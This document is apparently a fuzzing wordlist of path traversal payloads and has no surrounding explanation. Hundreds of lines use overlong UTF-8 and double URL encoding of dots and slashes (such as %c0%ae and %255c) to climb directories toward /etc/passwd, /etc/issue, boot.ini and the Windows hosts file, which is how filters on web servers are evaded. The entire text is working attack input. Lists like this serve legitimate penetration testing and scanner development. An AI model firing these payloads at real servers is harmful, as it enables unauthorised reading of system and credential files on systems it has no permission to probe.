-%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cpasswd -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cissue -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cboot.ini -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cpasswd -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cetc%255cissue -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cboot.ini -%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255c%c0%ae%c0%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%ae%c0%ae%c0%2fetc%c0%2fpasswd -%c0%ae%c0%ae%c0%2fetc%c0%2fissue -%c0%ae%c0%ae%c0%2fboot.ini -%c0%ae%c0%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fpasswd -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fissue -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fboot.ini -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fpasswd -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fissue -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fboot.ini -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fpasswd -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fissue -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fboot.ini -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fpasswd -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fissue -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fboot.ini -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fpasswd -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fetc%c0%2fissue -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fboot.ini -%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2f%c0%ae%c0%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%ae%c0%ae%c0%afetc%c0%afpasswd -%c0%ae%c0%ae%c0%afetc%c0%afissue -%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afissue -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afissue -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afissue -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afissue -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afissue -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%ae%c0%ae%c0%5cetc%c0%5cpasswd -%c0%ae%c0%ae%c0%5cetc%c0%5cissue -%c0%ae%c0%ae%c0%5cboot.ini -%c0%ae%c0%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cpasswd -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cissue -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cboot.ini -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cpasswd -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cissue -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cboot.ini -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cpasswd -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cissue -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cboot.ini -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cpasswd -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cissue -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cboot.ini -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cpasswd -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cetc%c0%5cissue -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cboot.ini -%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5c%c0%ae%c0%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd -%c0%ae%c0%ae%c1%9cetc%c1%9cissue -%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cissue -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cissue -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cissue -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cissue -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cetc%c1%9cissue -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cboot.ini -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%c0%ae%c0%ae%c1%pcetc%c1%pcpasswd -%c0%ae%c0%ae%c1%pcetc%c1%pcissue -%c0%ae%c0%ae%c1%pcboot.ini -%c0%ae%c0%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcpasswd -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcissue -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcboot.ini -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcpasswd -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcissue -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcboot.ini -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcpasswd -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcissue -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcboot.ini -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcpasswd -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcissue -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcboot.ini -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcpasswd -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcetc%c1%pcissue -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcboot.ini -%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pc%c0%ae%c0%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%c0%ae%c0%ae%c0%9vetc%c0%9vpasswd -%c0%ae%c0%ae%c0%9vetc%c0%9vissue -%c0%ae%c0%ae%c0%9vboot.ini -%c0%ae%c0%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vpasswd -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vissue -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vboot.ini -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vpasswd -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vissue -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vboot.ini -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vpasswd -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vissue -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vboot.ini -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vpasswd -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vissue -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vboot.ini -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vpasswd -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vetc%c0%9vissue -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vboot.ini -%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9v%c0%ae%c0%ae%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%c0%ae%c0%ae%c0%qfetc%c0%qfpasswd -%c0%ae%c0%ae%c0%qfetc%c0%qfissue -%c0%ae%c0%ae%c0%qfboot.ini -%c0%ae%c0%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfpasswd -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfissue -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfboot.ini -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfpasswd -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfissue -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfboot.ini -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfpasswd -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfissue -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfboot.ini -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfpasswd -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfissue -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfboot.ini -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfpasswd -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfetc%c0%qfissue -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfboot.ini -%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qf%c0%ae%c0%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%c0%ae%c0%ae%c1%8setc%c1%8spasswd -%c0%ae%c0%ae%c1%8setc%c1%8sissue -%c0%ae%c0%ae%c1%8sboot.ini -%c0%ae%c0%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8spasswd -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8sissue -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8sboot.ini -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8spasswd -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8sissue -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8sboot.ini -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8spasswd 